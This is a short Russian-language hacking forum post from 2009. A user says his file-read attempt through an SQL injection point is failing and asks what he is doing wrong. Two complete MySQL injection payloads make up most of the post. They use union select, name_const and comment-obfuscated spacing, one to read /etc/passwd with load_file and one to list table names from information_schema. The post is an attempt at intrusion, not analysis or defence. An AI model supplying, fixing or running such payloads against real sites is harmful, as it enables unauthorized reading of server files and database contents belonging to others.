17.11.2009, 12:19
|
|
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
С нами:
9851463
Репутация:
19
|
|
Есть инъекция, делаю запрос на load_file и ничего не выходит,
xek%'/**/union/**/select/**/*/**/from/**/(select/**/*/**/from/**/(select/**/name_const(substr(load_file('/etc/passwd'),1),1),name_const(substr(load_file('/etc/passwd'),1),1))a)b/*
Что делаю нетак? двойной запрос..
запрос на просмотр таблиц выглядит так:
xek%'/**/union/**/select/**/*/**/from/**/(select/**/*/**/from/**/(select/**/name_const((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),1),name_const((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),1))a)b/*
Последний раз редактировалось M1ks; 17.11.2009 в 12:23..
|
|
|